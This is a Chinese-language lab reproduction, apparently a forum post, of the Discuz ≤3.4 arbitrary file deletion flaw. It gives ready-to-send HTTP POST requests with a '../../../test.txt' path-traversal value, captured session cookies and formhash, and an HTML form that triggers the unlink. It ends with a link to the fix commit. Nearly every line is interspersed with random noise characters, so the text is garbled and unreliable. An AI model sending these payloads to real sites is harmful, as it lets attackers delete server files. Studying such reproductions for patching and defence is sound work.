|
8 V/ n2 z& R5 m$ N+ ~. k, G) Q& A' m" c- ~
前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。8 N, _0 `) j- R
影响版本:Discuz < =3.4 环境2 d4 T( i" V$ f- j5 ]
, v9 p( v. @) Y: d( l9 Z3 a$ S复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。
0 x/ f. ^5 J" ^& H3 A& I* I* S新建test.txt
6 \& D( O' L$ b/ S& K* g访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。1 Q0 ?+ d( x; q4 K6 n$ q; |
1 d; W+ ^8 K! `/ B1 G5 K
* C6 x. X5 ~" D/ T/ {- [$ E+ n查看formhash
1 ^) p7 m/ y4 x D1 S/ S$ O利用burp抓包,获取cookie1 s; u- l2 y$ a k; _$ d: a7 o
% q6 B: S5 v7 Z6 A, D+ X# P
6 A! |* y$ N; P( a) Q, _$ i0 Y+ X
, l l- I* O; b' G
# r; W, ^, D* _3 }$ q
, V* U3 w% G1 F- u* O+ W2 Q抓取cookie* I# D7 ` r- ^; n8 x
4 u; v' d% {( i# }: Q7 M: s5 i" o7 f1 z
发送下面数据包:修改cookie,formhash,还有删除的文件, O( @& @" _$ k8 }* |5 U
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1' r: J; R0 v8 X: k# `% w$ |
Host: localhost7 H, T% s/ u) e s0 L% ?! e# Y
Content-Length: 367$ c1 G7 E, A1 P2 `
Cache-Control: max-age=0) N4 C/ M5 s2 K" G" J y
Upgrade-Insecure-Requests: 1
+ Y: z4 \8 h* q- ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s, Q6 L# y6 A. Q, v2 m, q0 T& k& j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
! C+ J/ {* w8 p6 I1 t) KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8/ J6 k4 K' T" j# P x
Accept-Encoding: gzip, deflate* K. V: O% V( v/ s% I5 s4 n
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 J- d* T. i3 E5 u+ o
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C15779380560 @0 G& D0 t/ {' p) N; i' f
Connection: close
4 U) b' d1 J2 U2 z8 X; F------WebKitFormBoundaryPFvXyxL45f34L12s$ h) K/ k2 N" x* v
Content-Disposition: form-data; name="formhash"
1 Q! T0 F' z9 Y0 a' k z84a7f376
; }; c( U/ {- I' O6 x------WebKitFormBoundaryPFvXyxL45f34L12s
; W% }) n( _) e1 s; WContent-Disposition: form-data; name="birthprovince"# a- \" c) H# N: m6 r7 `
../../../test.txt) W2 {- A K8 J! G/ l
------WebKitFormBoundaryPFvXyxL45f34L12s6 z5 r3 S6 o( F7 D, u
Content-Disposition: form-data; name="profilesubmit"
+ f$ G S$ F8 W1" C, G* _5 q" Q# f. d l
------WebKitFormBoundaryPFvXyxL45f34L12s--; \! w8 t1 u+ { p
发送删除的数据包* e- r0 t! w6 ?- t2 K) w- Q/ |
刷新页面,查看出生地就会显示成下图所示的状态:" R5 o) e( a7 H% R, H; X
数据成功写入2 @9 a0 k5 y0 p+ b
- k" }; q* v& ^) Q
+ }: o# K. l! ^" Z; n3 e. ?
说明数据已经进入数据库:
& U3 l+ M& x) f" }& W3 ^然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:) M: X) K! B5 ^) U; @. g
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">2 C+ |/ S4 n( f7 r- S8 ^* P. o
<input type="file"name="birthprovince" id="file" />" X* T1 W; ]: u* n
<input type="text"name="formhash" value="84a7f376"/></p>/ m' n8 A- ?' V+ h$ A: m$ _
<input type="text"name="profilesubmit" value="1"/></p>3 f& F4 r5 Y0 f: H6 A
<input type="submit"value="Submit" />
" s" `2 a, |6 ?9 Y4 D; O- m( k</from>! y) d# X) g6 g/ H; H
4 ]* P7 b) v0 w0 v6 H' ?
: B0 Q4 O0 F4 ]7 l. \5 g0 `
4 ?# g! d% L- D" e4 P8 m) I* |; `7 p/ \% Z9 ^ x$ k& |% x
9 c+ P/ e6 q% r; C2 b
或者直接构建数据包:
B+ |3 S( X- V1 J# k" EPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
8 \. U7 e5 x3 P9 D6 c! lHost: 192.168.220.1315 k% x+ [" k3 Z, q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.05 i% v7 W% j& U9 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ ]6 k2 M; u J- q9 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 k" I( b* c+ U& N: Z5 N
Accept-Encoding: gzip, deflate ]; E6 i) D# ^
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
2 C: w* V* A8 u6 w9 b0 H! ?0 zContent-Length: 91989
g( L" M7 G4 i A- cConnection: close
: _$ K+ d# z, D {$ _Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
# y' s- d' Q& n/ X- hUpgrade-Insecure-Requests: 1
1 u4 b2 u9 K8 Z! U-----------------------------123821742118716$ o- Z, O9 d5 | G. Y. d
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
' N& @$ d9 F0 H. G6 y3 G* {$ b) s8 `Content-Type: image/jpeg) k- H, g( K! k5 e
zerba(这里写啥都可以)
: h) |" B( t5 i6 J& J# d! \-----------------------------123821742118716--
$ z P" O# _& \; \, ~
- ^4 S8 o+ x. D8 n' A; c+ \0 e3 j1 |" v0 k
8 a2 k9 `9 j$ ?/ e4 E4 ~
* C: G( N$ X e
: e5 `) k! @6 \! ?1 I. T6 d8 F
% a2 d7 ^3 ]2 d% [) {5 }0 ^% R* t- `9 z1 ~4 q: `0 A
8 F+ ~* g8 S! }: q# \, u
% ^# x: l3 \4 v% F, t3 z# [" X4 ?+ @- w6 L0 B4 b
3 z4 N1 H$ W+ \2 b% b
进去discuz看看,可以看到,test.txt文件已经被删除了。
) v- M. @5 p2 N& V4 k+ q- _2 g% @! l" C Y5 A; D/ V0 M- z
$ z k5 N* `) k4 X4 O& a0 i
& R( Y4 }9 |3 V! W8 E4 M3 k
5 f& U7 B) _, B+ y) p/ V- M+ s8 _( }' k
修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574; a. K; j' d! s7 L! u
编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
8 m/ U w! ^( \% D/ o! [# f- ]/ Q! ~( T2 m2 \8 u# v
! X( J$ O5 H( F
: O1 R: `; q0 g" q# ^# d" @
9 T7 e- f9 u( ~5 \* z9 X" [3 _5 e$ {% O1 t: B( k6 |3 U+ t
, w6 H( z, P4 b, r9 } u2 }
) {: W, f' m0 D( q4 d
* l' N5 e8 J9 u5 s( ?6 {* z) n/ f; I8 l
|
|